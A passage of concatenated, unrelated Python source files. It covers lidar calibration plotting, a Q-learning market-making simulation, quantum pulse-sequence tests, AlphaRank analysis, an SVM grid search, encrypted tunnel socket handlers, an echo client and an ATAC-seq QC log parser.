mng.resize(*mng.window.maxsize())
plt.figure()
plot_pcl(M_HDL32_PCL, label="M_HDL32")
plot_pcl(FL_aligned, label="FL_VLP16")
plot_pcl(FR_aligned, label="FR_VLP16")
plt.title("calibrated")
plt.axis("equal")
leg = plt.legend()
leg.legendHandles[0]._sizes = [30]
leg.legendHandles[1]._sizes = [30]
leg.legendHandles[2]._sizes = [30]
mng = plt.get_current_fig_manager()
mng.resize(*mng.window.maxsize())
plt.show()
if __name__ == '__main__':
output_filename = sys.argv[1] if len(sys.argv) > 1 else os.path.join(os.path.dirname(__file__), "multi_velodyne_calibration.yaml")
mvr = MultiVelodyneRegistration(output_filename)
mvr.run()
|
from .voivodeships import VOIVODESHIPS
from .api_codes import API_CODES
from .bir_version_maps import *
from .dev_environment import API_KEY_TEST_ENV
from .dev_environment import WARNINGS as DEV_ENV_WARNINGS
|
# Simulation of a multi-agent ask/bid setting with inventory
import copy
import numpy as np
import pickle
np.random.seed(12345)
class bcolors:
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
PINK = '\033[35m'
GREY = '\033[36m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
lr = 100000
# Use 2000000 for Fig. 2 and 3
n_periods = 2000000
eps = 1e-5
DELTA = 0.0
n_agents = 2
tick_num = 2
sig = 0.1
# Set to 0.0 for Fig.3
inven_factor = 0.0
temper = 0.1
# Comment out to replicate ask/bid spreads case in Fig.2 and 3
weights = np.zeros(tick_num)
space = np.zeros(tick_num)
space[0] = 0.1
space[1] = 0.8
# space = np.linspace(0.1, 0.5, tick_num)
# weights = np.linspace(0.0, 0.1, tick_num)
n_instance = 10
def reward_cal(action):
# Compute profits for all agents
reward = np.zeros(n_agents)
action = action.astype(int)
price = space[action]
# Only the lowest bid gets the order
kernel = np.sum(weights[action])
kernel = kernel / sig / n_agents
arrival_prob = np.exp(-kernel)
if np.random.binomial(1, arrival_prob, 1)[0]:
winner = np.where(price == price.min())
reward[winner] = price.min() / len(winner[0])
else:
winner = -1
return winner, reward
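# Illustrative example of reward_cal (values follow the settings above, not
# executed code): with space = [0.1, 0.8] and actions [0, 1], the quoted
# prices are [0.1, 0.8]. With the default all-zero weights the arrival
# probability is exp(0) = 1, so the order always arrives; only agent 0 (the
# lowest price) receives the reward 0.1, split evenly when several agents tie.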
def boltz_select(agent, Q):
prob = np.exp(Q[agent] / temper)
prob = prob / np.sum(prob)
return np.random.choice(tick_num ** 2, 1, p=prob)
# Q_hist = np.zeros((n_instance, n_periods+1, n_agents, tick_num ** 2))
Q_hist = []
Q_last = np.zeros((n_instance, n_agents, tick_num ** 2))
# inventory_hist = np.zeros((n_instance, n_periods+1, n_agents))
inventory_hist = []
for sess in range(n_instance):
steps_done = 0
# Counter for variations in heat
count = 0
inventory = np.zeros(n_agents)
Q = np.zeros((n_agents, tick_num ** 2))
epiQ_hist = []
epiI_hist = []
for i_episode in range(n_periods + 1):
# For each agent, select and perform an action
action = np.zeros(n_agents, dtype=int)
for i in range(n_agents):
if inventory[i] > 100:
action[i] = 1
elif inventory[i] < -100:
action[i] = 2
else:
action[i] = boltz_select(i, Q)
ask_action = (action // tick_num).astype(int)
bid_action = (action % tick_num).astype(int)
steps_done += 1
old_inventory = copy.deepcopy(inventory)
bid_winner, bid_reward = reward_cal(bid_action)
ask_winner, ask_reward = reward_cal(ask_action)
if bid_winner != -1:
inventory[bid_winner] += 1 / len(bid_winner[0])
if ask_winner != -1:
inventory[ask_winner] -= 1 / len(ask_winner[0])
inventory_change = inventory - old_inventory
# Inventory risk
reward_total = bid_reward + ask_reward - inven_factor * inventory_change**2
old_heat = Q.argmax(1)
if i_episode%10000 == 0:
epiQ_hist.append(copy.deepcopy(Q))
epiI_hist.append(copy.deepcopy(inventory))
alpha = lr/(lr + steps_done)
for i in range(n_agents):
Q[i, action[i]] = (1 - alpha)*Q[i, action[i]] + alpha*(reward_total[i] + DELTA*Q[i].max())
new_heat = Q.argmax(1)
if np.sum(np.abs(old_heat - new_heat)) == 0:
count += 1
else:
count = 0
if i_episode % 100000 == 0:
print(bcolors.GREEN + 'Session', sess, 'Step:', steps_done, bcolors.ENDC)
print('Greedy policy', Q.argmax(1))
print('Q', Q)
print('Bid', space[bid_action], 'Ask', space[ask_action])
print('Inventory', inventory, 'Count', count)
if count == 1000000:
print(bcolors.RED + 'Terminate condition satisfied.' + bcolors.ENDC)
print('Q', Q)
# break
Q_last[sess, :, :] = Q
Q_hist.append(epiQ_hist)
inventory_hist.append(epiI_hist)
Q_mean = Q_last.mean(axis=(0, 1))
prob = np.exp(Q_mean / temper)
prob = prob / prob.sum()
print('Mean values of Q', Q_mean)
print('Variance of Q', Q_last.var(0))
print('Probability of actions', prob)
# For Fig.2
# with open('Q_stag.pickle', 'wb') as fp:
# pickle.dump(np.array(Q_hist), fp)
#
# with open('inven_stag.pickle', 'wb') as fp:
# pickle.dump(np.array(inventory_hist), fp)
# For Fig. 3
with open('Q_hard.pickle', 'wb') as fp:
pickle.dump(np.array(Q_hist), fp)
with open('inven_hard.pickle', 'wb') as fp:
pickle.dump(np.array(inventory_hist), fp)
# For Fig. 7
# with open('Q_AB.pickle', 'wb') as fp:
# pickle.dump(np.array(Q_hist), fp)
#
# with open('inven_AB.pickle', 'wb') as fp:
# pickle.dump(np.array(inventory_hist), fp)
|
# Copyright 2016 by Raytheon BBN Technologies Corp. All Rights Reserved.
import unittest
# Test functions in multi.py
from .helpers import testable_sequence, discard_zero_Ids, \
channel_setup, assertPulseSequenceEqual
from pyqgl2.main import compile_function
from QGL import *
class TestMulti(unittest.TestCase):
def setUp(self):
channel_setup()
def tearDown(self):
pass
def test_multiQbitTest2(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
expected = [
Id(q1),
Id(q2),
X(q1),
X(q2),
Barrier(q1, q2),
MEAS(q1),
MEAS(q2)
]
resFunction = compile_function("test/code/multi.py",
"multiQbitTest2")
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expected)
def test_doSimple(self):
q2 = QubitFactory('q2')
expected = [
X(q2),
MEAS(q2)
]
resFunction = compile_function("test/code/multi.py",
"doSimple")
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expected)
def test_anotherMulti(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
expected = [
Id(q1),
Id(q2),
X(q1),
X(q2),
Barrier(q1, q2),
MEAS(q1),
MEAS(q2),
Y(q1),
Y(q2)
]
resFunction = compile_function("test/code/multi.py",
"anotherMulti")
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expected)
def test_anotherMulti2(self):
q1 = QubitFactory('q1')
q2 = QubitFactory('q2')
q3 = QubitFactory('q3')
#q1: Id, X, MEAS, <barrier>, Y, <barrier>
# q2: Id, X, MEAS, <barrier> ?Id?
# q3: <barrier>, Y, <barrier>
expected = [
Id(q1),
Id(q2),
X(q1),
X(q2),
Barrier(q1, q2, q3),
MEAS(q1),
MEAS(q2),
Barrier(q1, q2, q3),
Y(q1),
Y(q3)
]
resFunction = compile_function("test/code/multi.py",
"anotherMulti2")
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expected)
resFunction = compile_function("test/code/multi.py",
"anotherMulti3")
seqs = resFunction()
seqs = testable_sequence(seqs)
assertPulseSequenceEqual(self, seqs, expected)
|
# from https://github.com/deepmind/open_spiel
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import scipy.linalg as la
from open_spiel.python.egt import utils
from open_spiel.python.egt.alpharank import *
import matplotlib.patches as patches
import matplotlib
matplotlib.rcParams.update({'font.family': 'serif'})
import matplotlib.pyplot as plt
from rlkit.util.alpharank_visualizer import plot_pi_vs_alpha, NetworkPlot
def sweep_pi_vs_alpha(payoff_tables,
strat_labels=None,
warm_start_alpha=None,
m=50,
rtol=1e-5,
atol=1e-8):
"""Computes stationary distribution, pi, for range of selection intensities.
The range of selection intensities is defined in alpha_list and corresponds
to the temperature of the Fermi selection function.
Args:
payoff_tables: List of game payoff tables, one for each agent identity. Each
payoff_table may be either a numpy array, or a _PayoffTableInterface
object.
strat_labels: Human-readable strategy labels. See get_strat_profile_labels()
in utils.py for formatting details.
warm_start_alpha: Initial value of alpha to use.
m: AlphaRank population size.
rtol: The relative tolerance parameter for np.allclose calls.
atol: The absolute tolerance parameter for np.allclose calls.
Returns:
pi: AlphaRank stationary distribution.
    alpha: The AlphaRank selection-intensity level resulting from the sweep.
    fig: The matplotlib figure produced by plot_pi_vs_alpha.
"""
payoffs_are_hpt_format = utils.check_payoffs_are_hpt(payoff_tables)
num_populations = len(payoff_tables)
num_strats_per_population =\
utils.get_num_strats_per_population(payoff_tables, payoffs_are_hpt_format)
if num_populations == 1:
num_profiles = num_strats_per_population[0]
else:
num_profiles = utils.get_num_profiles(num_strats_per_population)
assert strat_labels is None or isinstance(strat_labels, dict)\
or (len(strat_labels) == num_profiles)
pi_list = np.empty((num_profiles, 0))
alpha_list = []
num_iters = 0
alpha_mult_factor = 2.
if warm_start_alpha is not None:
alpha = warm_start_alpha
alpharank_succeeded_once = False
else:
alpha = 1e-4 # Reasonable default for most games, can be user-overridden
while 1:
try:
_, _, pi, _, _ = compute(payoff_tables, alpha=alpha, m=m)
pi_list = np.append(pi_list, np.reshape(pi, (-1, 1)), axis=1)
alpha_list.append(alpha)
# Stop when pi converges
if num_iters > 0 and np.allclose(pi, pi_list[:, num_iters - 1], rtol,
atol):
break
alpha *= alpha_mult_factor
num_iters += 1
alpharank_succeeded_once = True
except ValueError as _:
if warm_start_alpha is not None and not alpharank_succeeded_once:
# When warm_start_alpha is used, there's a chance that
# the initial warm_start_alpha is too large and causes exceptions due to
# the Markov transition matrix being reducible. So keep decreasing until
# a single success occurs.
alpha /= 2
elif not np.allclose(pi_list[:, -1], pi_list[:, -2], rtol, atol):
# Sweep stopped due to multiple stationary distributions, but pi had
# not converged due to the alpha scaling being too large.
alpha /= alpha_mult_factor
alpha_mult_factor = (alpha_mult_factor + 1.) / 2.
alpha *= alpha_mult_factor
else:
break
if strat_labels is None:
strat_labels = utils.get_strat_profile_labels(payoff_tables,
payoffs_are_hpt_format)
fig = plot_pi_vs_alpha(
pi_list.T,
alpha_list,
num_populations,
num_strats_per_population,
strat_labels,
num_strats_to_label=10)
return pi, alpha, fig
def compute_and_report_alpharank(payoff_tables,
m=50,
alpha=100,
verbose=False,
num_top_strats_to_print=8):
"""Computes and visualizes Alpha-Rank outputs.
Args:
payoff_tables: List of game payoff tables, one for each agent identity. Each
payoff_table may be either a numpy array, or a _PayoffTableInterface
object.
m: Finite population size.
alpha: Fermi distribution temperature parameter.
verbose: Set to True to print intermediate results.
num_top_strats_to_print: Number of top strategies to print.
Returns:
pi: AlphaRank stationary distribution/rankings.
"""
payoffs_are_hpt_format = utils.check_payoffs_are_hpt(payoff_tables)
rhos, rho_m, pi, _, _ = compute(payoff_tables, m=m, alpha=alpha)
strat_labels = utils.get_strat_profile_labels(payoff_tables,
payoffs_are_hpt_format)
if verbose:
print_results(payoff_tables, payoffs_are_hpt_format, pi=pi)
utils.print_rankings_table(
payoff_tables,
pi,
strat_labels,
num_top_strats_to_print=num_top_strats_to_print)
m_network_plotter = NetworkPlot(
payoff_tables, rhos, rho_m, pi, strat_labels, num_top_profiles=8)
m_network_plotter.compute_and_draw_network()
return pi
|
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import ShuffleSplit
from sklearn.svm import SVC
from sklearn import svm,datasets
from sklearn.model_selection import GridSearchCV
def chooseBestParams(dataset,label):
parameters={'kernel':('rbf','linear'),'C':[1,5,7]}
svr=svm.SVC()
clf=GridSearchCV(svr,parameters)
clf.fit(dataset,label)
print("网格搜索最优参数:",clf.best_estimator_)
return clf.best_estimator_
def svmScore(dataset,label,train_dat,train_tag):
clf=chooseBestParams(dataset=dataset,label=label)
clf.fit(train_dat,train_tag)
pre=clf.predict(dataset)
ans=pre[pre==label]
ans=(ans.shape[0]/label.shape[0])
return ans
# svmScore(iris.data,iris.target,iris.data,iris.target)
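# Hedged usage sketch (not part of the original script): the unused imports
# above suggest cross-validation was intended; one way to combine them with
# the grid-searched estimator on the bundled iris data could be:
#
#   iris = datasets.load_iris()
#   best = chooseBestParams(iris.data, iris.target)
#   cv = ShuffleSplit(n_splits=5, test_size=0.3, random_state=0)
#   print(cross_val_score(best, iris.data, iris.target, cv=cv).mean())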
|
from magma import *
IOBUF = DeclareCircuit("IOBUF", "T", In(Bit),
"I", In(Bit),
"IO", InOut(Bit),
"O", Out(Bit))
def IOB(**params):
iob = IOBUF(**params)
args = ["T", iob.T, "I", iob.I, "IO", iob.IO, "O", iob.O]
return AnonymousCircuit(args)
|
#!/usr/bin/env python3
import pywind.evtframework.handlers.udp_handler as udp_handler
import pywind.evtframework.handlers.tcp_handler as tcp_handler
import socket, time
import freenet.lib.base_proto.utils as proto_utils
import freenet.lib.logging as logging
class tcp_tunnel(tcp_handler.tcp_handler):
__crypto = None
__crypto_configs = None
__conn_timeout = None
def init_func(self, creator, address, crypto, crypto_configs, conn_timeout=800, is_ipv6=False):
self.__crypto_configs = crypto_configs
self.__crypto = crypto
self.__conn_timeout = conn_timeout
if is_ipv6:
fa = socket.AF_INET6
else:
fa = socket.AF_INET
s = socket.socket(fa, socket.SOCK_STREAM)
if is_ipv6: s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.set_socket(s)
self.bind(address)
self.listen(10)
self.register(self.fileno)
self.add_evt_read(self.fileno)
return self.fileno
def tcp_accept(self):
while 1:
try:
cs, address = self.accept()
self.create_handler(
self.fileno, _tcp_tunnel_handler, self.__crypto,
self.__crypto_configs, cs, address, self.__conn_timeout
)
except BlockingIOError:
break
''''''
return
def tcp_delete(self):
self.unregister(self.fileno)
self.close()
class _tcp_tunnel_handler(tcp_handler.tcp_handler):
__encrypt = None
__decrypt = None
__address = None
__update_time = 0
__conn_timeout = 0
__LOOP_TIMEOUT = 10
def init_func(self, creator, crypto, crypto_configs, cs, address, conn_timeout):
self.__address = address
self.__conn_timeout = conn_timeout
self.__update_time = time.time()
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
self.set_socket(cs)
self.register(self.fileno)
self.add_evt_read(self.fileno)
self.__encrypt = crypto.encrypt()
self.__decrypt = crypto.decrypt()
self.__encrypt.config(crypto_configs)
self.__decrypt.config(crypto_configs)
logging.print_general("tcp_connect", address)
return self.fileno
def tcp_readable(self):
rdata = self.reader.read()
self.__decrypt.input(rdata)
while self.__decrypt.can_continue_parse():
try:
self.__decrypt.parse()
except proto_utils.ProtoError:
self.delete_handler(self.fileno)
return
while 1:
pkt_info = self.__decrypt.get_pkt()
if not pkt_info: break
session_id, action, message = pkt_info
self.dispatcher.handle_msg_from_tunnel(self.fileno, session_id, self.__address, action, message)
''''''
return
def tcp_writable(self):
self.remove_evt_write(self.fileno)
def tcp_error(self):
self.delete_handler(self.fileno)
def tcp_timeout(self):
t = time.time()
if t - self.__update_time > self.__conn_timeout:
self.delete_handler(self.fileno)
return
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
def tcp_delete(self):
self.unregister(self.fileno)
self.close()
logging.print_general("tcp_disconnect", self.__address)
def send_msg(self, session_id, address, action, message):
sent_pkt = self.__encrypt.build_packet(session_id, action, message)
self.writer.write(sent_pkt)
self.add_evt_write(self.fileno)
self.__encrypt.reset()
self.__update_time = time.time()
class udp_tunnel(udp_handler.udp_handler):
def init_func(self, creator, address, crypto, crypto_configs, is_ipv6=False):
if is_ipv6:
fa = socket.AF_INET6
else:
fa = socket.AF_INET
s = socket.socket(fa, socket.SOCK_DGRAM)
if is_ipv6: s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
self.set_socket(s)
self.bind(address)
self.register(self.fileno)
self.add_evt_read(self.fileno)
self.__encrypt = crypto.encrypt()
self.__decrypt = crypto.decrypt()
self.__encrypt.config(crypto_configs)
self.__decrypt.config(crypto_configs)
return self.fileno
def udp_readable(self, message, address):
result = self.__decrypt.parse(message)
if not result: return
session_id, action, byte_data = result
self.dispatcher.handle_msg_from_tunnel(self.fileno, session_id, address, action, byte_data)
def udp_writable(self):
self.remove_evt_write(self.fileno)
def udp_error(self):
self.delete_handler(self.fileno)
def udp_timeout(self):
pass
def udp_delete(self):
self.unregister(self.fileno)
self.close()
def send_msg(self, session_id, address, action, message):
ippkts = self.__encrypt.build_packets(session_id, action, message)
self.__encrypt.reset()
for ippkt in ippkts: self.sendto(ippkt, address)
self.add_evt_write(self.fileno)
|
import asyncio
import virtualreality.util.utilz as u
addrs = ("127.0.0.1", 6969)
myTasks = []
async def tcp_echo_client(message, loop):
reader, writer = await asyncio.open_connection(*addrs, loop=loop)
# print('Send: %r' % message)
writer.write(u.format_str_for_write("nut"))
data = await u.read(reader)
print("Received: %r" % data)
print("Close the socket")
writer.write(u.format_str_for_write("CLOSE"))
writer.close()
message = "Hello World!\n"
loop = asyncio.get_event_loop()
loop.run_until_complete(tcp_echo_client(message, loop))
loop.close()
|
"""
Adapted from https://github.com/ENCODE-DCC/atac-seq-pipeline/blob/master/src/encode_lib_log_parser.py
"""
from collections import OrderedDict
from statistics import median
import json
import os
def to_int(var):
try:
return int(var)
except ValueError:
return None
def to_float(var):
try:
return float(var)
except ValueError:
return None
def to_bool(var):
return var.lower() in set(['true', 't', 'ok', 'yes', '1'])
def parse_barcode_matching_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["barcode_matching_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
words = f.readline().rstrip('\n').split(' ')
passing, total = words[0].split('/')
result['num_reads_matched'] = to_int(passing)
result['num_reads_total'] = to_int(total)
result['frac_reads_matched'] = result['num_reads_matched'] / result['num_reads_total']
next(f)
next(f)
for line in f:
k, v = line.rstrip('\n').split()
if k == "0":
result['num_match_dist_0'] = to_int(v)
if k == "1":
result['num_match_dist_1'] = to_int(v)
return result
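# Layout inferred from the parser above (illustrative, not an official spec):
# the stats file is expected to start with a "matched/total ..." line, two
# lines that are skipped, then "distance count" pairs, e.g.
#   950/1000 reads matched
#   <skipped>
#   <skipped>
#   0 900
#   1 50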
def parse_adapter_trimming_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["adapter_trimming_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
for line in f:
entries = line.rstrip('\n').split(':')
if entries[0] == 'reads with adapter trimmed':
result['num_reads_trimmed'] = to_int(entries[1].strip())
return result
def parse_barcode_revcomp_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
result['barcode_reverse_complement'] = False
return result
result["barcode_revcomp_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
for line in f:
k, v = line.rstrip('\n').split(':')
if k == 'Reverse-complement chosen':
result['barcode_reverse_complement'] = to_bool(v.strip())
return result
def parse_bwt2_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["_bwt2_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
a = next(f)
result["_bwt2_num_reads"] = to_int(a.split(" ")[0]) * 2
next(f)
b = next(f)
result["_bwt2_num_unaligned"] = to_int(b.lstrip().split(" ")[0]) * 2
c = next(f)
result["_bwt2_num_single"] = to_int(c.lstrip().split(" ")[0]) * 2
d = next(f)
result["_bwt2_num_multi"] = to_int(d.lstrip().split(" ")[0]) * 2
return result
def parse_frac_mito_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["mito_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
h = f.readline().rstrip('\n').split('\t')
mito_ind = h.index('Mitochondrial')
non_mito_ind = h.index('Non-Mitochondrial')
for line in f:
entries = line.rstrip('\n').split('\t')
result['mito_reads'] = to_int(entries[mito_ind])
result['non_mito_reads'] = to_int(entries[non_mito_ind])
result['frac_mito_reads'] = result['mito_reads'] / (result['mito_reads'] + result['non_mito_reads'])
return result
def parse_flagstat_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["samstats"] = {"path": os.path.abspath(txt)}
total = ''
total_qc_failed = ''
duplicates = ''
duplicates_qc_failed = ''
mapped = ''
mapped_qc_failed = ''
mapped_pct = ''
paired = ''
paired_qc_failed = ''
read1 = ''
read1_qc_failed = ''
read2 = ''
read2_qc_failed = ''
paired_properly = ''
paired_properly_qc_failed = ''
paired_properly_pct = ''
with_itself = ''
with_itself_qc_failed = ''
singletons = ''
singletons_qc_failed = ''
singletons_pct = ''
diff_chroms = ''
diff_chroms_qc_failed = ''
delimiter_pass_fail = ' + '
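    # Example samtools flagstat lines this parser looks for (illustrative):
    #   "5038650 + 0 in total (QC-passed reads + QC-failed reads)"
    #   "4970683 + 0 mapped (98.65% : N/A)"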
with open(txt, 'r') as f:
for line in f:
if ' total ' in line:
if ' in total ' in line:
tmp1 = line.split(' in total ')
else:
tmp1 = line.split(' total ')
line1 = tmp1[0]
tmp1 = line1.split(delimiter_pass_fail)
total = tmp1[0]
total_qc_failed = tmp1[1]
if ' duplicates' in line:
tmp2 = line.split(' duplicates')
line2 = tmp2[0]
tmp2 = line2.split(delimiter_pass_fail)
duplicates = tmp2[0]
duplicates_qc_failed = tmp2[1]
if ' mapped (' in line:
tmp3 = line.split(' mapped (')
line3_1 = tmp3[0]
tmp3_1 = line3_1.split(delimiter_pass_fail)
mapped = tmp3_1[0]
mapped_qc_failed = tmp3_1[1]
line3_2 = tmp3[1]
tmp3_2 = line3_2.split(':')
mapped_pct = tmp3_2[0] # .replace('%','')
if ' paired in sequencing' in line:
tmp2 = line.split(' paired in sequencing')
line2 = tmp2[0]
tmp2 = line2.split(delimiter_pass_fail)
paired = tmp2[0]
paired_qc_failed = tmp2[1]
if ' read1' in line:
tmp2 = line.split(' read1')
line2 = tmp2[0]
tmp2 = line2.split(delimiter_pass_fail)
read1 = tmp2[0]
read1_qc_failed = tmp2[1]
if ' read2' in line:
tmp2 = line.split(' read2')
line2 = tmp2[0]
tmp2 = line2.split(delimiter_pass_fail)
read2 = tmp2[0]
read2_qc_failed = tmp2[1]
if ' properly paired (' in line:
tmp3 = line.split(' properly paired (')
line3_1 = tmp3[0]
tmp3_1 = line3_1.split(delimiter_pass_fail)
paired_properly = tmp3_1[0]
paired_properly_qc_failed = tmp3_1[1]
line3_2 = tmp3[1]
tmp3_2 = line3_2.split(':')
paired_properly_pct = tmp3_2[0] # .replace('%','')
if ' with itself and mate mapped' in line:
tmp3 = line.split(' with itself and mate mapped')
line3_1 = tmp3[0]
tmp3_1 = line3_1.split(delimiter_pass_fail)
with_itself = tmp3_1[0]
with_itself_qc_failed = tmp3_1[1]
if ' singletons (' in line:
tmp3 = line.split(' singletons (')
line3_1 = tmp3[0]
tmp3_1 = line3_1.split(delimiter_pass_fail)
singletons = tmp3_1[0]
singletons_qc_failed = tmp3_1[1]
line3_2 = tmp3[1]
tmp3_2 = line3_2.split(':')
singletons_pct = tmp3_2[0] # .replace('%','')
if ' with mate mapped to a different chr' in line:
tmp3 = line.split(' with mate mapped to a different chr')
line3_1 = tmp3[0]
tmp3_1 = line3_1.split(delimiter_pass_fail)
diff_chroms = tmp3_1[0]
diff_chroms_qc_failed = tmp3_1[1]
if total:
result['total_reads'] = int(total)
if total_qc_failed:
result['total_reads_qc_failed'] = int(total_qc_failed)
if duplicates:
result['duplicate_reads'] = int(duplicates)
if duplicates_qc_failed:
result['duplicate_reads_qc_failed'] = int(duplicates_qc_failed)
if mapped:
result['mapped_reads'] = int(mapped)
if mapped_qc_failed:
result['mapped_reads_qc_failed'] = int(mapped_qc_failed)
if mapped_pct:
if 'nan' not in mapped_pct and 'N/A' not in mapped_pct \
and 'NA' not in mapped_pct:
if '%' in mapped_pct:
mapped_pct = mapped_pct.replace('%', '')
result['frac_mapped_reads'] = float(mapped_pct) / 100.
else:
result['frac_mapped_reads'] = float(mapped_pct)
else:
result['frac_mapped_reads'] = 0.0
if paired:
result['paired_reads'] = int(paired)
if paired_qc_failed:
result['paired_reads_qc_failed'] = int(paired_qc_failed)
if read1:
result['read1'] = int(read1)
if read1_qc_failed:
result['read1_qc_failed'] = int(read1_qc_failed)
if read2:
result['read2'] = int(read2)
if read2_qc_failed:
result['read2_qc_failed'] = int(read2_qc_failed)
if paired_properly:
result['properly_paired_reads'] = int(paired_properly)
if paired_properly_qc_failed:
result['properly_paired_reads_qc_failed'] = int(
paired_properly_qc_failed)
if paired_properly_pct:
if 'nan' not in paired_properly_pct and \
'N/A' not in paired_properly_pct \
and 'NA' not in paired_properly_pct:
if '%' in paired_properly_pct:
paired_properly_pct = paired_properly_pct.replace('%', '')
result['frac_properly_paired_reads'] = float(paired_properly_pct) / 100.
else:
result['frac_properly_paired_reads'] = float(paired_properly_pct)
else:
result['frac_properly_paired_reads'] = 0.0
if with_itself:
result['with_itself'] = int(with_itself)
if with_itself_qc_failed:
result['with_itself_qc_failed'] = int(with_itself_qc_failed)
if singletons:
result['singletons'] = int(singletons)
if singletons_qc_failed:
result['singletons_qc_failed'] = int(singletons_qc_failed)
if singletons_pct:
if 'nan' not in singletons_pct and 'N/A' not in singletons_pct \
and 'NA' not in singletons_pct:
if '%' in singletons_pct:
singletons_pct = singletons_pct.replace('%', '')
            result['frac_singletons'] = float(singletons_pct) / 100.
else:
result['frac_singletons'] = float(singletons_pct)
else:
result['frac_singletons'] = 0.0
if diff_chroms:
result['diff_chroms'] = int(diff_chroms)
if diff_chroms_qc_failed:
result['diff_chroms_qc_failed'] = int(diff_chroms_qc_failed)
return result
def parse_dup_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["picard_markdup_stats"] = {"path": os.path.abspath(txt)}
paired_reads = ''
unpaired_reads = ''
unmapped_reads = ''
unpaired_dupes = ''
paired_dupes = ''
paired_opt_dupes = ''
dupes_pct = ''
picard_log_found = False
# picard markdup
with open(txt, 'r') as f:
header = '' # if 'UNPAIRED_READS_EXAMINED' in header
content = ''
for line in f:
if header:
content = line.replace(',', '.')
picard_log_found = True
break
if 'UNPAIRED_READS_EXAMINED' in line:
header = line
if picard_log_found:
header_items = header.split('\t')
content_items = content.split('\t')
m = dict(zip(header_items, content_items))
unpaired_reads = m['UNPAIRED_READS_EXAMINED']
paired_reads = m['READ_PAIRS_EXAMINED']
unmapped_reads = m['UNMAPPED_READS']
unpaired_dupes = m['UNPAIRED_READ_DUPLICATES']
paired_dupes = m['READ_PAIR_DUPLICATES']
paired_opt_dupes = m['READ_PAIR_OPTICAL_DUPLICATES']
if 'PERCENT_DUPLICATION' in m:
dupes_pct = m['PERCENT_DUPLICATION']
else:
dupes_pct = '0'
else:
# sambamba markdup
with open(txt, 'r') as f:
for line in f:
if ' end pairs' in line:
tmp1 = line.strip().split(' ')
paired_reads = tmp1[1]
if ' single ends ' in line:
tmp1 = line.strip().split(' ')
unpaired_reads = tmp1[1]
unmapped_reads = tmp1[6]
if 'found ' in line:
tmp1 = line.strip().split(' ')
if paired_reads == '0':
unpaired_dupes = tmp1[1] # SE
paired_dupes = 0
else:
unpaired_dupes = 0
                        paired_dupes = str(int(tmp1[1]) // 2) # PE (pairs, not reads)
if paired_reads == '0': # SE
dupes_pct = '{0:.2f}'.format(
float(unpaired_dupes)/float(unpaired_reads))
elif paired_reads:
dupes_pct = '{0:.2f}'.format(
float(paired_dupes)/float(paired_reads))
if unpaired_reads:
result['unpaired_reads'] = int(unpaired_reads)
if paired_reads:
result['paired_reads'] = int(paired_reads)
if unmapped_reads:
result['unmapped_reads'] = int(unmapped_reads)
if unpaired_dupes:
result['unpaired_duplicate_reads'] = int(unpaired_dupes)
if paired_dupes:
result['paired_duplicate_reads'] = int(paired_dupes)
if paired_opt_dupes:
result['paired_optical_duplicate_reads'] = int(paired_opt_dupes)
if dupes_pct:
result['frac_duplicate_reads'] = float(dupes_pct)
return result
def parse_lib_complexity_qc(txt):
result = OrderedDict()
if os.path.getsize(txt) == 0:
return result
result["pbc_stats"] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
next(f)
arr = f.readline().strip().split('\t')
result['total_fragments'] = to_int(arr[0])
result['distinct_fragments'] = to_int(arr[1])
result['positions_with_one_read'] = to_int(arr[2])
result['positions_with_two_reads'] = to_int(arr[3])
result['NRF'] = to_float(arr[4])
result['PBC1'] = to_float(arr[5])
result['PBC2'] = to_float(arr[6])
return result
def m_splice(line, prefix, suffix):
if line.startswith(prefix) and line.endswith(suffix):
return line.removeprefix(prefix).removesuffix(suffix)
return None
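# Example of the helper above:
#   m_splice("Identified 1200 total barcodes for multiplet detection",
#            "Identified ", " total barcodes for multiplet detection")
# returns "1200"; lines that do not match both affixes return None. Note that
# str.removeprefix/removesuffix require Python 3.9+.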
def multiplet_detection_qc(txt, ps, pe, bs, mt):
result = OrderedDict()
if os.path.getsize(ps) > 0:
result['barcode_pairs_multiplets'] = {"path": os.path.abspath(ps)}
if os.path.getsize(pe) > 0:
result['barcode_pairs_expanded'] = {"path": os.path.abspath(pe)}
if os.path.getsize(bs) > 0:
result['barcodes_status'] = {"path": os.path.abspath(bs)}
if os.path.getsize(mt) > 0:
result['multiplet_threshold_plot'] = {"path": os.path.abspath(mt)}
if os.path.getsize(txt) > 0:
result['multiplet_stats'] = {"path": os.path.abspath(txt)}
with open(txt, 'r') as f:
for l in f:
line = l.split('-')[-1].lstrip(' ').rstrip('\n')
n = m_splice(line, 'Original run had ', ' total cell barcodes')
if n is not None:
